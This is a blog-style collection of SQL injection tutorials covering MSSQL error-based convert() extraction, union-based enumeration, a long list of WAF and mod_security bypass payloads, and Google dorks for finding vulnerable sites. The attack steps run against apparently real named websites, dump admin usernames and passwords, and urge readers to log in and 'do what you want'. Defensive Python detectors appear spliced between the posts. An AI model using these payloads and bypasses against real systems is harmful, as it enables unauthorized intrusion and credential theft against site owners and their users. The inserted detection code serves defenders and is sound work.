My Blog List

09 October, 2022

MSSQL Injection Using Convert - Penetration Testing - Bug Bounty Program

In our previous tutorial we discussed union-based injection.

Now let's come to the next part. In this tutorial you will learn how to inject a site with the convert attack, and how the command actually works: convert() casts a value from one data type to another, so when we ask the server to convert a string (a version string, a table name, a column value) to an integer, the conversion fails and the error message the server returns contains the exact value we asked it to convert.


So let's start our injection manually.

We have a target; let's check whether it is vulnerable to injection. We request the URL with a single quote (') added at the end of the target parameter.


http://www.Vuln-Site.com/authorprofile.asp?id=46'

It gives us an error:

ERROR:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string ''.
/authorprofile.asp, line 10


Our target site is vulnerable. Since we are injecting with the convert attack we do not need to count the total number of columns; we execute our commands with convert directly.

Let's check the version.

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,@@version)--

After executing the query we get the version in the error message.

Here is the version: Microsoft SQL Server 2012 - 11.0.5582.0 (X64) Feb 27 2015 18:10:15 Copyright (c) Microsoft Corporation Web Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1)

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2012 - 11.0.5582.0 (X64) Feb 27 2015 18:10:15 Copyright (c) Microsoft Corporation Web Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1) ' to data type int.
/authorprofile.asp, line 10

Now let's check the current database name.

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,db_name())--


And we have the current database name.

This is the current database name: museindia
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'museindia' to data type int.
/authorprofile.asp, line 10

Now that we have the version and the database name, let's move on to getting the tables.

This is our query for getting the tables:
http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1 table_name from information_schema.tables))--+

After executing the query we get the first table name.

Table name: about
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'about' to data type int.
/authorprofile.asp, line 10

To get the other tables from the database we add our previous table name, enclosed in single quotes, inside the round brackets of a NOT IN list.

For example:
and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('OUR_PREVIOUS_TABLE_NAME_1','OUR_PREVIOUS_TABLE_NAME_2')))--+

So let's check the other tables in the database.

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('about')))--+

And we have the next table name.

Next table name: aucon

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'aucon' to data type int.
/authorprofile.asp, line 10

In this way we continue getting the other tables until we reach the table we need.

Here we got the table name: members


Now let's get the column names from this table.

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='members'))--+

We have the first column name.

This is the first column name: memberid

Let's get the other columns the same way we got the other tables from the database.

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='members' and column_name not in ('memberid')))--+


After getting the column names, the final part is extracting data from the columns.

This will be our final query!

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1 OUR_COLUMN_NAME_HERE from OUR_TABLE_NAME_HERE))--+

This query prints the data from the column on the webpage, inside the conversion error message.
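Added example, not from the original post: a Python triage helper for the error pages this post relies on. It parses the ODBC error format to show exactly which value a verbose conversion error disclosed, and pairs that with request-side signals (convert(int, ...), catalogue reads, the NOT IN walk), which is what a log reviewer needs to confirm that an application's verbose error page is leaking database contents and must be turned off. The error bodies and query strings are constructed samples.

```python
import re
from urllib.parse import unquote_plus

# Error header as surfaced by the ADO/ODBC provider in the pages shown above.
ODBC_CODE_RE = re.compile(
    r"Microsoft OLE DB Provider for (?:ODBC Drivers|SQL Server) error '(?P<code>80040e\w+)'"
)
# In a conversion error the quoted value is exactly what the database disclosed.
LEAK_RE = re.compile(
    r"Conversion failed when converting the \w+ value '(?P<value>.*?)' to data type \w+\.",
    re.DOTALL,
)
UNCLOSED_RE = re.compile(r"Unclosed quotation mark after the character string")


def classify_error_page(body: str) -> dict:
    """Classify a response body as a syntax error (an injection probe reached the
    database) or a conversion error (the database leaked a value), else neither."""
    code = ODBC_CODE_RE.search(body)
    leak = LEAK_RE.search(body)
    result = {"code": code.group("code") if code else None, "kind": None, "leaked": None}
    if leak:
        result["kind"] = "conversion_leak"
        result["leaked"] = leak.group("value").strip()
    elif UNCLOSED_RE.search(body):
        result["kind"] = "syntax_error"
    return result


# Request-side signals of this technique: convert(int, ...) around a subquery or
# system function, catalogue reads, and the NOT IN walk used to enumerate names.
CONVERT_RE = re.compile(r"convert\s*\(\s*int\s*,", re.I)
CATALOG_RE = re.compile(r"information_schema\.(?:tables|columns)|@@version|db_name\s*\(", re.I)
ENUM_RE = re.compile(r"\bnot\s+in\s*\(", re.I)


def classify_request(raw_query: str) -> list:
    """Return the signal names found in one URL-encoded query string."""
    q = re.sub(r"\s+", " ", unquote_plus(raw_query)).strip()
    signals = []
    if CONVERT_RE.search(q):
        signals.append("convert_cast")
    if CATALOG_RE.search(q):
        signals.append("catalog_read")
    if ENUM_RE.search(q):
        signals.append("not_in_enumeration")
    return signals


def triage(raw_query: str, body: str) -> str:
    """One verdict for a request/response pair, strongest evidence first."""
    req = classify_request(raw_query)
    resp = classify_error_page(body)
    if resp["kind"] == "conversion_leak" and "convert_cast" in req:
        return "CONFIRMED: error-based extraction, leaked %r" % resp["leaked"]
    if resp["kind"] == "syntax_error":
        return "PROBE: injection test reached the database (verbose error exposed)"
    if req:
        return "ATTEMPT: " + ",".join(req)
    return "clean"


# Constructed samples with the shape of the error pages shown in this post.
PROBE_PAGE = """Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string ''.
/authorprofile.asp, line 10"""

LEAK_PAGE = """Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'museindia' to data type int.
/authorprofile.asp, line 10"""
```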

24 March, 2022

MSSQL Union Based Injection Part-2 - Advanced Method

In this tutorial you will learn some advanced methods that will help you with injecting.

On normal sites we run ORDER BY to count the columns and then prepare a UNION-based query to find the vulnerable columns, but in some cases we get stuck at the UNION-based step. So for this tutorial I have found a site to practise on.

First we check the vulnerability: as usual we add a single quote (') at the end of the parameter.

After executing the URL it gives us an error!

As our target is vulnerable, let's start injecting manually. First let's check how many columns there are, using the ORDER BY command to count them.

http://www.genuinecomputers.in/products.asp?pro=PenDrives order by 1--+
No error!!

http://www.genuinecomputers.in/products.asp?pro=PenDrives order by 100---+
Again no error!!

http://www.genuinecomputers.in/products.asp?pro=PenDrives order by 1000---+
Still no error!!

Let's try string-based injection, so we add a single quote after the parameter. But if you look at the error response, the application is itself adding a closing bracket ")" after our input, so we add the single quote together with a closing bracket ")" after the parameter.

http://www.genuinecomputers.in/products.asp?pro=PenDrives') order by 1---+
No error!! Site loaded normally.

http://www.genuinecomputers.in/products.asp?pro=PenDrives') order by 6---+
Again no error!!

http://www.genuinecomputers.in/products.asp?pro=PenDrives') order by 7---+
Here we have got an error!!




ERROR:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 7 is out of range of the number of items in the select list.
/products.asp, line 131

So there are 6 columns in total. Now let's prepare our UNION-based command for finding the vulnerable columns.

http://www.genuinecomputers.in/products.asp?pro=PenDrives') union select 1,2,3,4,5,6---+

But here we get an error!



ERROR:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the varchar value 'PenDrives' to data type int.
/products.asp, line 131

Although our column count is correct, the problem is with the numeric values: as the error shows, the original query's first column holds a varchar ('PenDrives'), which cannot be converted to the int type of our literal 1. To bypass this error we use NULL values instead of numbers and execute our UNION-based query again.

http://www.genuinecomputers.in/products.asp?pro=PenDrives') and 1=2 union select null,null,null,null,null,null---+

Bingo :p Error bypassed!!


But we cannot see the vulnerable columns. So we check every column one by one. First let's check the version: we put @@version in the 1st column, and if nothing shows we change it back to null and move on to the next one.

http://www.genuinecomputers.in/products.asp?pro=PenDrive') union select @@version,null,null,null,null,null--+

Here we got the version.



Version:
Microsoft SQL Server 2012 (SP1) - 11.0.3000.0 (X64) Oct 19 2012 13:38:57 Copyright (c) Microsoft Corporation Web Edition (64-bit) on Windows NT 6.2 <X64> (Build 9200: )

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2012 (SP1) - 11.0.3000.0 (X64) Oct 19 2012 13:38:57 Copyright (c) Microsoft Corporation Web Edition (64-bit) on Windows NT 6.2 <X64> (Build 9200: ) ' to data type smallint.
/products.asp, line 131

Now let's check the tables in the current database.

http://www.genuinecomputers.in/products.asp?pro=PenDrive') union select table_name,null,null,null,null,null from information_Schema.tables--+

Here we got the table name.



As this is the first table name, let's check the next one. To find the other tables we add this part to our query:
where table_name not in ('PREVIOUS_TABLE_1','PREVIOUS_TABLE_2')

http://www.genuinecomputers.in/products.asp?pro=PenDrive') union select table_name,null,null,null,null,null from information_Schema.tables where table_name not in ('products')--+

After getting the tables, next we check the columns. We use this query for getting the columns from the table:

http://www.genuinecomputers.in/products.asp?pro=PenDrive') union select column_name,null,null,null,null,null from information_Schema.columns where table_name='OUR_TABLE_NAME_HERE'--+

Once we have the first column, we add this part to our query to check the other columns:

http://www.genuinecomputers.in/products.asp?pro=PenDrive') union select column_name,null,null,null,null,null from information_Schema.columns where table_name='OUR_TABLE_NAME_HERE' and column_name not in ('PREVIOUS_COLUMN_1','PREVIOUS_COLUMN_2')--+

After getting the table and the columns, the final part is extracting data from the columns.

So this is the final query:

http://www.genuinecomputers.in/products.asp?pro=PenDrive') union select OUR_COLUMN_HERE,null,null,null,null,null from OUR_TABLE_HERE--+

10 March, 2022

MSSQL Union Based Injection

In MySQL database. Now let's come to injecting the MSSQL database.
In this tutorial we will discuss MSSQL union-based injection. Although MSSQL injection is similar to MySQL, it is not the same: MySQL injection is easier than MSSQL injection.

So let's start our injecting.
We have a target site. First we have to check whether it is vulnerable to MSSQL injection or not. For this purpose we add a single quote (') at the end of the parameter.
Let us say our target site is the one below; add a single quote ' at the end to check the vulnerability:

http://www.AnySite.com/news.asp?id=10'

After executing the request with the single quote it gives this type of error:

ERROR:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark after the character string ''.
/news.asp, line 9

So it means our target site is vulnerable to MSSQL injection.
Next we have to balance our query. Here are some comment sequences that we can apply on our target site:

http://www.AnySite.com/news.asp?id=10-- Loading fine!

http://www.AnySite.com/news.asp?id=10--+ Loading fine!

http://www.AnySite.com/news.asp?id=10%23 Loading fine!

http://www.AnySite.com/news.asp?id=10; Loading fine!

As you know, each site has a different WAF, so try the different comment sequences for balancing the query. After balancing the query, next we have to count the columns. For this we normally use the ORDER BY command.

http://www.AnySite.com/news.asp?id=10 order by 1--+ Site loaded normally!

http://www.AnySite.com/news.asp?id=10 order by 5--+ Again site loaded normally!

http://www.AnySite.com/news.asp?id=10 order by 15--+ Again site loaded normally, and there is no error of any kind!

http://www.AnySite.com/news.asp?id=10 order by 16--+ Here we have got an error!!

Error:
Microsoft OLE DB Provider for SQL Server error '80040e14'
The ORDER BY position number 16 is out of range of the number of items in the select list.
/news.asp, line 9

So it means there are 15 columns in total. Now let's prepare our UNION-based command. To find the vulnerable columns we have to make the original condition false (and 1=2) so that the row from our UNION is the one displayed.

http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+

After executing the UNION-based command you can see the vulnerable columns printed on the webpage.

In my case 5,6,7,8,9 are the vulnerable columns there.
So now let's check the version. To find the version we use @@version. We cannot use version() here, as it is an MSSQL database, not MySQL.

Let's give the command for checking the version:

http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT 1,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15--+

After executing the query you can see the version printed on the webpage:

Version:
Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64) Apr 2 2010 15:48:46 Copyright (c) Microsoft Corporation Express Edition with Advanced Services (64-bit) on Windows NT 6.2 (Build 9200:) (Hypervisor)

Now let's check the current database name. For this we put db_name() in the vulnerable column.

http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT 1,2,3,4,db_name(),6,7,8,9,10,11,12,13,14,15--+

After executing this command you can see the database name printed out there.

Database name:
bietdb

Here are some other functions and their uses:

FUNCTION        : USE
@@version       : current version
db_name()       : current database name
system_user     : current user name
user_name()     : current user name
current_user()  : current user name

The next part is to get the tables from the database. As we cannot use group_concat here, we have to get the tables one by one. So this will be our query for getting the tables:

http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables--+

And you can see the first table name printed there.

So admin is the first table name here. If you want to get the other tables, use this query:

http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_name not in ('admin')--+

In place of admin we add our previous table name to get the next one, and we continue doing so until we get the table that we want.
Remember that every table name must be inside the round brackets and enclosed in single quotes, as you can see in this query:

where table_name not in ('Previous_Table_name_1','Previous_Table_name_2')

So let's execute this query to get the other tables in the database.
Here is our second table in the database.


Now let's get the columns from the tables. This will be our query for the columns:

http://www.AnySite.com/news.asp?id=10 and 0=1 UNION SELECT 1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_name=('admin')--+

After executing this query you can see the first column name.

This is the first column in that table. Let's get the other columns from that table. For this purpose we use this query:

http://www.AnySite.com/news.asp?id=10 and 0=1 UNION SELECT 1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_name=('admin') and column_name not in ('emp_name')--+

In the highlighted part we add the previous column name to get the next one, as we did for getting the tables. You can keep doing this until you get the column name that you want.

So let's execute this query to get the other columns.
You can see the next column name printed there.


Now that we have the column names, let's extract data from them. As we cannot use group_concat in MSSQL, we use + (URL-encoded as %2b) to concatenate the columns, with a space in single quotes between them. So our final query for extracting data from the columns will be:

http://www.AnySite.com/news.asp?id=10 and 0=1 UNION SELECT 1,2,3,4,user_name%2b' '%2buser_pass,6,7,8,9,10,11,12,13,14,15 from admin--+

After executing the query you can see the username and password printed in the picture above.

You can follow the same procedure for extracting data from other columns.
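Added example, not part of either MSSQL union-based tutorial above: a Python log reviewer for the probing sequence both posts walk through (single-quote test, ORDER BY walk up to the first out-of-range error, then UNION SELECT carrying @@version, db_name() or information_schema). It parses constructed W3C-style IIS log lines (date time c-ip cs-uri-stem cs-uri-query sc-status; this field order, the IPs and the 500 status for ASP errors are assumptions) and flags, per client, an ORDER BY walk followed by a UNION SELECT, or any catalogue read.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

ORDER_BY_RE = re.compile(r"\border\s+by\s+(\d+)", re.I)
UNION_RE = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
# The UNION row being used to read server or catalogue data, as in the posts.
PROBE_RE = re.compile(r"@@version|db_name\s*\(|information_schema\.(?:tables|columns)", re.I)


def decode(query: str) -> str:
    """URL-decode and collapse whitespace; the posts write spaces as '+' and '+' as %2b."""
    return re.sub(r"\s+", " ", unquote_plus(query)).strip()


def parse_line(line: str):
    """Parse 'date time c-ip cs-uri-stem cs-uri-query sc-status' (assumed layout), or None."""
    parts = line.split()
    if len(parts) != 6:
        return None
    _date, _time, ip, stem, query, status = parts
    return {"ip": ip, "stem": stem, "query": decode(query), "status": int(status)}


def summarize(log_text: str) -> dict:
    """Per-client counters describing the enumeration sequence."""
    clients = defaultdict(lambda: {
        "requests": 0, "errors": 0, "order_by_count": 0,
        "order_by_max": 0, "union_select": 0, "catalog_probe": 0,
    })
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        c = clients[rec["ip"]]
        c["requests"] += 1
        if rec["status"] >= 500:
            c["errors"] += 1  # assumed: the ODBC error pages come back as HTTP 500
        m = ORDER_BY_RE.search(rec["query"])
        if m:
            c["order_by_count"] += 1
            c["order_by_max"] = max(c["order_by_max"], int(m.group(1)))
        if UNION_RE.search(rec["query"]):
            c["union_select"] += 1
        if PROBE_RE.search(rec["query"]):
            c["catalog_probe"] += 1
    return dict(clients)


def suspicious_clients(log_text: str, min_order_by: int = 2) -> list:
    """Clients that walked ORDER BY and then issued a UNION SELECT, or read the catalogue."""
    flagged = []
    for ip, c in summarize(log_text).items():
        walked = c["order_by_count"] >= min_order_by
        if (walked and c["union_select"]) or c["catalog_probe"]:
            flagged.append(ip)
    return sorted(flagged)


# Constructed sample log reproducing the sequence both tutorials describe.
SAMPLE_LOG = """2022-03-10 09:00:01 198.51.100.7 /news.asp id=10 200
2022-03-10 09:00:04 198.51.100.7 /news.asp id=10' 500
2022-03-10 09:00:10 198.51.100.7 /news.asp id=10+order+by+1--+ 200
2022-03-10 09:00:15 198.51.100.7 /news.asp id=10+order+by+15--+ 200
2022-03-10 09:00:19 198.51.100.7 /news.asp id=10+order+by+16--+ 500
2022-03-10 09:00:30 198.51.100.7 /news.asp id=10+and+1=2+UNION+SELECT+1,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15--+ 200
2022-03-10 09:00:45 198.51.100.7 /news.asp id=10+and+0=1+UNION+SELECT+1,2,3,4,user_name%2b'+'%2buser_pass,6,7,8,9,10,11,12,13,14,15+from+admin--+ 200
2022-03-10 09:01:00 203.0.113.9 /news.asp id=11 200
2022-03-10 09:01:05 203.0.113.9 /news.asp id=12 200"""
```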

16 July, 2021

MSSQL Union Based Injection


Union Based SQL Injection (Mod_Security)

What is Mod_Security?

ModSecurity is an open-source web application firewall (WAF) supported by different web servers: Apache, Nginx and IIS. The module is configured to protect web applications from various attacks.
This topic is similar to manual SQL injection, but mod_security protects the website against being hacked, as you can see in this screenshot.


Now in this tutorial we will learn how to bypass mod_security.
First we need a target website.

In my case I am using this website:

http://www.legion.com.pk

Finding The Amount Of Columns

Now that you have found a vulnerable site, you need to find the number of columns. You can do this by using the ORDER BY clause. Your link should now look like this:

Code:
http://www.legion.com.pk/pages.php?ID=18 order by 1--+ (no error)
http://www.legion.com.pk/pages.php?ID=18 order by 2--+ (no error)
http://www.legion.com.pk/pages.php?ID=18 order by 3--+ (no error)
http://www.legion.com.pk/pages.php?ID=18 order by 4--+ (no error)
http://www.legion.com.pk/pages.php?ID=18 order by 5--+ (no error)
http://www.legion.com.pk/pages.php?ID=18 order by 6--+ (error)


Finding Vulnerable Columns

So now that you have the number of columns, you want to see which ones you can get data from. You do this by using UNION SELECT or UNION ALL SELECT. First, you add a - in front of your ID number. It should look like this:

Code:
http://www.legion.com.pk/pages.php?ID=18 union select 1,2,3,4,5--+

But you can see an error:


Now let's see how to bypass this security.
/*!50000 */ inline comments are used to bypass mod_security.

It should look like this:

http://www.legion.com.pk/pages.php?ID=18+/*!50000union*/+/*!50000select*/+1,2,3,4,5--+


Getting Table Names

Now we want to get the tables from the database. It should look like this:

Code:
http://www.legion.com.pk/pages.php?ID=18+/*!50000union*/+/*!50000select*/+1,2,3,4,/*!50000gROup_cONcat(table_name,0x0a)*/+from+/*!50000inforMAtion_schema*/.tables+/*!50000wHEre*/+/*!50000taBLe_scheMA*/like+database()--+


Getting Columns Out Of Tables

It should look like this:
Code:
http://www.legion.com.pk/pages.php?ID=18+/*!50000union*/+/*!50000select*/+1,2,3,4,/*!50000gROup_cONcat(column_name,0x0a)*/+from+/*!50000inforMAtion_schema*/.columns+/*!50000wHEre*/+/*!50000taBLe_name*/=CHAR(97, 100, 109, 105,110)--+


Getting Data from Columns

OK, so I see username and password, and that's what I want.
Now we just replace a few things.

Code:
http://www.legion.com.pk/pages.php?ID=-18 /*!50000union*/ /*!50000select*/1,2,3,4,/*!50000gROup_cONcat(Username,0x0a,Password)*/from+/*!50000admin*/--+

We got the user and password 😏😏
User = admin
Password = admin
Now just find the admin page and log in and do what you want to do.

Union Based SQL injection (WAF Bypassing)

What is WAF?

A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as cross-site scripting (XSS) and SQL injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.

Today I am going to discuss union-based SQL injection and WAF bypassing techniques. When you are testing for this SQLi vulnerability you will face a FORBIDDEN page (403 error). Typically, you can find the vulnerable page and find the column count, and then when you switch to the UNION SELECT statement the errors start up. This is typically due to server-side rules that are filtering out your request, often referred to as a web application firewall or WAF, but don't worry, as there are ways we can beat them. You can get pretty creative with the methods used, but for now I will show how to use comments to bypass the filters, sometimes referred to as inline comments or C comments. I will re-use some of my previous examples and assume the following details have gotten us to where we are now:

Here Is Our Target.

http://www.targetsite.com/news.php?id=11

Add Single Quote (') at the End Of The URL.

http://www.targetsite.com/news.php?id=11'

And Get MYSQL Error.

Let’s Balance Our Query for Further Injecting.

Some Comments from our Previous Tutorials.

http://www.targetsite.com/news.php?id=11--
http://www.targetsite.com/news.php?id=11--+
http://www.targetsite.com/news.php?id=11-- -
http://www.targetsite.com/news.php?id=11%23
http://www.targetsite.com/news.php?id=11;

 
Here is a small explanation of balancing and comments in our injection.

After balancing our query, next we count the total number of columns:

http://www.targetsite.com/news.php?id=11 order by 1--+
No Error!

http://www.targetsite.com/news.php?id=11 order by 3--+
No Error!

http://www.targetsite.com/news.php?id=11 order by 5--+
Again No Error!

http://www.targetsite.com/news.php?id=11 order by 6--+
Here We Get Error!

Unknown column '6' in 'order clause'

Now let's try to find our vulnerable columns.

http://www.targetsite.com/news.php?id=-11 Union Select 1,2,3,4,5--+

If our target site is protected with a WAF, the WAF will block our query and give us a Mod_Security error. Once the UNION SELECT has been wrapped in inline comments (see the bypass list below), there is no more 403 Forbidden message stopping you and you can see the vulnerable columns displayed on the page. I will re-use my examples and assume columns 2, 4 and 5 are vulnerable. Now that we have the vulnerable columns we can extract some data, but let's first find some basic info. We will use CONCAT to grab the current database name, the current user, and the version info, like this:

http://www.targetsite.com/index.php?id=-725+/*!UNION*/+/*!SELECT*/+1,CONCAT(database(),user(),version()),3,4,5--
(403 Forbidden – WTF?)

  

So here are some WAF bypassing methods. Just replace the UNION SELECT with one of the following bypasses.

/*!%55NiOn*/ /*!%53eLEct*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/

Let's continue our tutorial.

OK, so now we have commented out our UNION SELECT statement but something is still setting off the filters... it is most likely the CONCAT statement. In some cases, it is possible to bypass filters by simply changing the norm up and re-testing. This can be accomplished by comments or by simply changing CaPiTAliZaTIon, like so:

http://www.targetsite.com/index.php?id=-725+/*!UNION*/+/*!SELECT*/+1,ConCAt(database(),user(),version()),3,4,5--
(No errors!!)

Results:
· Version = 5.0.92-community-log
· User = dumbdba@localhost
· Database() = exampleDB

It worked; we now know the current database name, user name, and the version, as they are neatly displayed on the page for us. These two techniques can be combined to evade filters throughout your injections, as you will see. Now let us try to get the list of all the databases available, instead of just the current one, like so:

http://www.targetsite.com/index.php?id=-725+/*!UNION*/+/*!SELECT*/+1,GROUP_CONCAT(SCHEMA_NAME),3,4,5+FROM+INFORMATION_SCHEMA.SCHEMATA--
(403 Forbidden)

Luckily we know what to do now, so start by altering GROUP_CONCAT, the same as we did for CONCAT:

http://www.targetsite.com/index.php?id=-725+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(SCHEMA_NAME),3,4,5+FROM+INFORMATION_SCHEMA.SCHEMATA--
(No errors!!)

Results:
· Information_Schema
· exampleDB

This should now show us the available databases! Now let us check for the tables tied to the current database.

http://www.targetsite.com/index.php?id=-725+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(TABLE_NAME),3,4,5+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--
(403 Forbidden again)

In some cases you may have experienced a 403 in the previous step as well; it is due to the fact that oftentimes INFORMATION_SCHEMA or TABLES will be filtered. Again, this changes from site to site based on how it was configured, so it could even be other items, but these are the most common. In order to get around the filters we simply need to use our comments method again, so it looks like this:

http://www.targetsite.com/index.php?id=-725+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(TABLE_NAME),3,4,5+FROM+/*!INFORMATION_SCHEMA*/.TABLES--
(No errors!!)

TABLES FOUND: Admin, News, Ads, Users

Now we have all of the tables for the current database displayed on the page without any 403 holding us back. We can get columns using the same method as in the Basic SQLi 101 examples, but we keep our comments and capitalization techniques alive so it gets past the WAF (reminder to also HEX your table names).

http://www.targetsite.com/index.php?id=-725+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(COLUMN_NAME),3,4,5+FROM+/*!INFORMATION_SCHEMA*/.COLUMNS+WHERE+TABLE_NAME=0x41646d696e--
(No Errors!!)

The page will now display a list of the columns from the Admin table in the vulnerable column 2 spot on the page. In this example, we will assume we found the following column names:
· id
· login
· password
· email

OK, now we know the tables and associated columns. It is time to get some data extracted, and it will go the same as it did in the Basic SQLi tutorial, or like this:

http://www.targetsite.com/index.php?id=-725+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(id,0x3a,login,0x3a,password,0x3a,email,0x3a),3,4,5+FROM+Admin--

You will get the Admin details.
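The comment and capitalization tricks in this post work because the filter matches the request text more or less as it arrives. As an added example (not code from this blog), here is a small Python model of both sides: a naive filter that only URL-decodes and then does a case-sensitive substring match, which is the kind of filter the ConCAt and /*!UNION*/ payloads above walk past, and a normalizing filter that unwraps MySQL /*!...*/ version comments, strips ordinary comments, collapses whitespace and case-folds before applying the same blocklist. The sample query strings are constructed from the payloads shown in this post; the blocklist and the function names are my own assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample query strings: the payloads shown in this post plus one benign request.
SAMPLES = {
    "plain":  "id=-725+UNION+SELECT+1,CONCAT(database(),user(),version()),3,4,5--",
    "bypass": "id=-725+/*!UNION*/+/*!SELECT*/+1,ConCAt(database(),user(),version()),3,4,5--",
    "schema": "id=-725+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(TABLE_NAME),3,4,5+FROM+/*!INFORMATION_SCHEMA*/.TABLES--",
    "benign": "id=725",
}

# Assumed blocklist; "CONCAT" also covers GROUP_CONCAT as a substring.
BLOCKED_TOKENS = ("UNION SELECT", "CONCAT")


def naive_filter(query_string):
    """URL-decode, then case-sensitive substring match on the raw text.
    This is the kind of filter the mixed-case and /*!...*/ payloads evade."""
    decoded = unquote_plus(query_string)
    return any(tok in decoded for tok in BLOCKED_TOKENS)


def normalize(query_string):
    """Canonicalize the input the way the database will actually read it."""
    s = unquote_plus(query_string)                           # '+' -> space, %xx decoded
    s = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", s, flags=re.S)   # MySQL executes /*!UNION*/ as UNION
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)             # ordinary comments are just whitespace
    s = re.sub(r"\s+", " ", s).strip()                       # collapse the gaps left behind
    return s.upper()                                         # case-fold so ConCAt == CONCAT


def normalized_filter(query_string):
    """Same blocklist, applied to the canonical form instead of the raw text."""
    return any(tok in normalize(query_string) for tok in BLOCKED_TOKENS)


def compare(samples=SAMPLES):
    """Return {name: (naive_verdict, normalized_verdict)} for each sample."""
    return {name: (naive_filter(q), normalized_filter(q)) for name, q in samples.items()}


if __name__ == "__main__":
    for name, (naive, norm) in compare().items():
        print("%-7s naive=%-5s normalized=%s" % (name, naive, norm))
```

Normalization closes the specific gap this post exploits (the "bypass" and "schema" samples are blocked only by the normalized filter), but it is a detection aid rather than a fix: the request still reaches the database unchanged, so the mitigation that actually removes the bug is a parameterized query in index.php.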

Basic Union Based Injection | hackerworld99 | Sqli | SQL Injection

Basic Union Based Injection

First off we need a vulnerable website. Google is the best partner for finding vulnerable sites: we use Google Dorks to search for vulnerable websites. A Google Dork is the trick to find the perfect match, and here we are going to use the "inurl:" operator to find the vulnerable websites.

[Example of Google Dork:]

inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

inurl:play_old.php?id=

inurl:declaration_more.php?decl_id=

inurl:pageid=sa

inurl:games.php?id=

inurl:page.php?file=

[How to use]

Copy one of the above commands and paste it into the Google search box, then hit Enter. You will get a list of websites. We have to visit the websites one by one to check for the vulnerability.



